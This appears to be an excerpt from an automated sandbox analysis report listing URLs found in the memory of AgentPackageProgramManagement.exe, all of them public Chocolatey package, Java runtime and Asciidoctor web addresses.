Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://asciidoctor.org/
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://asciidoctor.org/docs/user-manual/
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://asciidoctor.zulipchat.com/
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aws.amazon.com/corretto/
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB319B000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3024000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB307C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bell-sw.com/
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://blog.adoptopenjdk.net/2021/03/transition-to-eclipse-an-update/)
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugs.openjdk.java.net/
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.jsdelivr.net/gh/IdealChain/chocolatey-packages
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.statically.io/gh/asciidoctor/brand/b9cf5e27/logo/logo-fill-color.svg
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chocolatey.org/packages/adoptopenjdkjre):
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chocolatey.org/packages/jre8)
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB319B000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB302C000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB2E41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.chocolatey.org
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB319B000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3080346987.0000011CCC064000.00000002.00000001.01000000.00000044.sdmp	String found in binary or memory: https://community.chocolatey.org/api/v2
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB319B000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3080346987.0000011CCC064000.00000002.00000001.01000000.00000044.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB30EF000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3080346987.0000011CCBDE2000.00000002.00000001.01000000.00000044.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB2E41000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3460000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB307C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.chocolatey.org/api/v2/
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB302C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.chocolatey.org/api/v2/$metadata
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB302C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.chocolatey.org/api/v2/$metadata0
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.chocolatey.org/api/v2/P
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.chocolatey.org/api/v2/Search
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB30EF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.chocolatey.org/api/v2/Search()?$filter=IsApproved
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB30EF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.chocolatey.org/api/v2/Search()?$filter=IsApproved%20and%20IsLatestVersion&$orderby
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.chocolatey.org/api/v2/package/Temurin11jre/11.0.25.9
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.chocolatey.org/api/v2/package/Temurin17jre/17.0.13.11
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.chocolatey.org/api/v2/package/Temurin8jre/8.432.6
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.chocolatey.org/api/v2/package/Temurinjre/21.0.5.11
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.chocolatey.org/api/v2/package/adoptopenjdk11jre/11.0.11.901
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.chocolatey.org/api/v2/package/adoptopenjdk11openj9jre/11.0.11.900
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.chocolatey.org/api/v2/package/adoptopenjdk12jre/12.0.2.10
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.chocolatey.org/api/v2/package/adoptopenjdk14jre/14.0.2.1200
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.chocolatey.org/api/v2/package/adoptopenjdk8jre/8.292.10.901
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.chocolatey.org/api/v2/package/adoptopenjdk8openj9jre/8.292.10
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.chocolatey.org/api/v2/package/adoptopenjdkjre/16.0.1.901
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.chocolatey.org/api/v2/package/asciidoctorj/2.5.13
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.chocolatey.org/api/v2/package/corretto8jre/8.432.6.1
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.chocolatey.org/api/v2/package/flyway.commandline.withjre/10.21.0
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.chocolatey.org/api/v2/package/javaruntime-platformspecific/7.0.79.20161125
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.chocolatey.org/api/v2/package/josm/19265.0.0
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.chocolatey.org/api/v2/package/jre6/6.0.43
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.chocolatey.org/api/v2/package/liberica17jre/17.0.13.12
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.chocolatey.org/api/v2/package/openjdk11jre/11.0.16.20220913
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.chocolatey.org/api/v2/package/server-jre/8.0.192
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.chocolatey.org/api/v2/package/server-jre10/10.0.1
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.chocolatey.org/api/v2/package/server-jre8/8.0.202
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.chocolatey.org/api/v2/package/teamcity-preinstalledjre/2024.12.0
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.chocolatey.org/api/v2/package/teamcity/2024.12.0
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.chocolatey.org/package/ReportAbuse/Temurin11jre/11.0.25.9
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.chocolatey.org/package/ReportAbuse/Temurin17jre/17.0.13.11
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.chocolatey.org/package/ReportAbuse/Temurin8jre/8.432.6
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.chocolatey.org/package/ReportAbuse/Temurinjre/21.0.5.11
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.chocolatey.org/package/ReportAbuse/adoptopenjdk11jre/11.0.11.901
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.chocolatey.org/package/ReportAbuse/adoptopenjdk11openj9jre/11.0.11.900
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.chocolatey.org/package/ReportAbuse/adoptopenjdk12jre/12.0.2.10
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.chocolatey.org/package/ReportAbuse/adoptopenjdk14jre/14.0.2.1200
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.chocolatey.org/package/ReportAbuse/adoptopenjdk8jre/8.292.10.901
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.chocolatey.org/package/ReportAbuse/adoptopenjdkjre/16.0.1.901
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.chocolatey.org/package/ReportAbuse/asciidoctorj/2.5.13
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.chocolatey.org/package/ReportAbuse/corretto8jre/8.432.6.1
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.chocolatey.org/package/ReportAbuse/flyway.commandline.withjre/10.21.0
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.chocolatey.org/package/ReportAbuse/javaruntime-platformspecific/7.0.79.20161125
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.chocolatey.org/package/ReportAbuse/josm/19265.0.0
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.chocolatey.org/package/ReportAbuse/jre6/6.0.43
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.chocolatey.org/package/ReportAbuse/liberica17jre/17.0.13.12
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.chocolatey.org/package/ReportAbuse/openjdk11jre/11.0.16.20220913
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.chocolatey.org/package/ReportAbuse/server-jre/8.0.192
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.chocolatey.org/package/ReportAbuse/server-jre10/10.0.1
